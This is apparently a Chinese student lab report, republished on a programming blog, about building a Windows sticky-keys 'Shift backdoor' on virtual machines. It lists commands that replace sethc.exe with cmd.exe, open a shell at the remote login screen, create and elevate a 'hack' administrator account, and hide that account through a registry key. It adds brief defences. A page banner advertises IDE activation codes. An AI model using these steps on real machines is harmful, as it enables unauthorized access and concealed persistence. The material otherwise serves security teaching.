创建shift后门实验总结_shift加delete

创建shift后门实验总结_shift加delete一、实验目的及要求 1.学会创建Shift后门 2.掌握shift后门的原理 二、实验设备(环境)及要求 PC机,VC++等,虚拟云平台 三、实验内容与步骤 1.在192.168.1.3的虚拟机上打开cmd命令指示符; 2.输入“cdc:\WINDOWS\system32”,进入该文件夹; 3.输入…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

一、实验目的及要求

1. 学会创建Shift后门

2.掌握shift后门的原理

 

二、实验设备(环境)及要求

   PC机, VC++等,虚拟云平台

三、实验内容与步骤

1.在192.168.1.3的虚拟机上打开cmd命令指示符;

2.输入“ cd  c:\WINDOWS\system32”,进入该文件夹;

3.输入“move sethc.exe sethc.exe.bak”,对“sethc.exe”进行备份;

4.输入“copy cmd.exe sethc.exe”,对cmd.exe进行复制并更名为“sethc.exe”;

5.打开控制面板-> 辅助功能选项->勾选“使用粘滞键”,点击应用;

6.打开192.168.1.2的虚拟机,打开运行,输入“mstsc”打开远程登录程序;

7.输入“192.168.1.3”,点击连接;

8.当出现登录界面时,按5下shift键可进入目标机的cmd中;

9.在cmd中输入“net user hack 123 /add”,创建用户;

10.接下来输入“net localgroup administrators hack /add”和“net user hack /active:yes”,对hack用户进行提权和激活;

11.用hack用户登录目标机。

 

 

四、实验结果与数据处理

1.对192.168.1.3的虚拟机的命令操作

 

 

创建shift后门实验总结_shift加delete

 

2.使用粘滞键

创建shift后门实验总结_shift加delete

 

 

 

 

3.用192.168.1.2的虚拟机远程登录192.168.1.3的虚拟机时,创建用户。并对其进行提权和激活

创建shift后门实验总结_shift加delete

 

 

 

 

4.成功登录目标机

 

 

 

 

 

 

创建shift后门实验总结_shift加delete

 

 

五、分析与讨论

  1.本实验是利用在应用“使用粘滞键”后,windows系统在按5次shift后会调用“sethc.exe”应用程序的原理,将cmd.exe复制并更名为“sethc.exe”,然后替换掉原有的sethc.exe文件,这样在登陆界面的时候我们连续按下5吃shift键系统就会运行cmd.exe,这样我们就可以对目标机进行创建用户,对用户进行相关提权和激活,从而进入目标机。

  2.防范措施:

(1)禁用shift键的粘滞功能;

(2)设置权限,让任何用户都无法访问和修改“sethc.exe”文件。

3.如何创建隐藏用户:

  创建用户后,按win+r,输入regedit回车,把注册表放到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList,在里面创建一个dword值,命名为你要隐藏的用户名,数值0。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/192139.html原文链接:https://javaforall.net

(0)
上一篇 2026年1月18日 下午2:43
下一篇 2026年1月18日 下午3:15


相关推荐

  • 效率倍增,推荐6个好用到爆的Pycharm插件

    效率倍增,推荐6个好用到爆的Pycharm插件相信对于不少的Python程序员们都是用Pycharm作为开发时候的IDE来使用的。今天我来分享几个好用到爆的Pycharm插件,在安装上之后,你的编程效率、工作效率都能够得到极大地提升。喜欢本文点赞、收藏、关注。部分插件技术群朋友分享,在此表示感谢。【文末】提供技术交流群安装方法插件的安装方法一点都不难打开file—settings—plugins,在右侧的文本框中输入想要查看的插件名称,在下方就会罗列出已经安装的相关的插件找到我们所需要的对应插件之后,点击install即可完成下载,然后重

    2022年8月29日
    4
  • java gearman_Gearman使用示例

    java gearman_Gearman使用示例最近的一个旧项目重构过程中 使用到了 gearman 这个开源项目 简单来讲 这是一个类似 MQ 的异步系统 一边派发任务 一边处理任务 有类似 MQ 中的消息发送方与接收方 目前支持 java php 等多种语言 缺点是存在单点问题 server 的 HA 官方没有提供方案 需要二次开发 下面是 java 语言的示例 注 gearman 的 java 客户端实例有好几个版本 不同的版本之间相差巨大 建议使用官方推荐的最新版

    2026年3月18日
    1
  • gridview属性_datagridview设置列宽

    gridview属性_datagridview设置列宽usingSystem;usingSystem.Collections.Generic;usingSystem.Text;usingSystem.Drawing;usingSystem.Windows.Forms;classSetDataViewGirdStyle{   privatestaticColor_mLinearBeginColor;

    2026年3月4日
    3
  • 域名和IP地址的区别和联系(ip和域名的异同点)

    域名和IP地址的区别:1.域名是相对于网站来说的,IP地址是相对于网络来说的,准确的说是通过DNS服务器来完成的,你提交域名,他给你返回一个IP地址,也称之为域名解析),接着做出一个相应,将信息返回。流程:输入域名—-域名解析服务器(dns)解析成IP地址—访问IP地址—完成访问的内容—返回信息2.IP地址是指互联网协议地址(英语:InternetProtocolAddress…

    2022年4月11日
    66
  • php layer弹出层更改背景,详解Layer弹出层样式[通俗易懂]

    php layer弹出层更改背景,详解Layer弹出层样式[通俗易懂]前言:学习layer弹出框,之前项目是用bootstrap模态框,后来改用layer弹出框,在文章的后面,我会分享项目的一些代码(我自己写的)。layer至今仍作为layui的代表作,她的受众广泛并非偶然,而是这五年多的坚持,不断完善和维护、不断建设和提升社区服务,使得猿们纷纷自发传播,乃至于成为今天的Layui最强劲的源动力。目前,layer已成为国内最多人使用的web弹层组件,GitHub自然…

    2022年7月13日
    17
  • Scrapy项目 – 数据简析 – 实现腾讯网站社会招聘信息爬取的爬虫设计

    Scrapy项目 – 数据简析 – 实现腾讯网站社会招聘信息爬取的爬虫设计一、数据分析截图本例实验,使用Weka3.7对腾讯招聘官网中网页上所罗列的招聘信息,如:其中的职位名称、链接、职位类别、人数、地点和发布时间等信息进行数据分析,详见如下图:图1-1Weka3.7分析界面图1-2职位数据ZeroR分析界面图1-3数据聚类分析界面图1-4数据Visualize分析界面二、数据分析结论由图2-1可知,随着应聘人数的…

    2022年5月2日
    57

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号